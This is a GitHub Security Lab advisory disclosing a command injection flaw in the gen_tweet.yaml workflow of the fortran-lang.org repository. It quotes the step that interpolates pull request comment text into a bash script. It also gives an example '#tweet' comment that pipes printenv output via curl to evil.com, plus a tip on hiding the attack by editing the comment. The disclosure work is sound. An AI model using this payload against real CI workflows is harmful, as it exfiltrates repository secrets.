The 'gen_tweet.yaml' GitHub workflow is vulnerable to arbitrary command injection.
fortran-lang/fortran-lang.org GitHub repository
gen_tweet.yaml from the master branch.
When a user comments on a Pull Request with a #tweet
it automatically starts the gen_tweet.yaml GitHub workflow. The comment text is used to format a bash script.
tweet:
runs-on: ubuntu-latest
if: github.event.issue.pull_request && startsWith(github.event.comment.body,'#tweet')
steps:
...
- name: extract the new tweet message
id: get-comment-body
run: |
body=$(echo "${{github.event.comment.body}}" | sed '1 s/#tweet//' | sed '1 s/ //')
...
This vulnerability allows for arbitrary command injection into the bash script. For example a user may comment with #tweet `printenv | curl -X POST --data-binary @- http://evil.com`
which will exfiltrate the environment variables to the attacker controlled server. To make the attack less visible the attacker may modify the comment later.
This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).
You can contact the GHSL team at securitylab@github.com
, please include a reference to GHSL-2020-190
in any communication regarding this issue.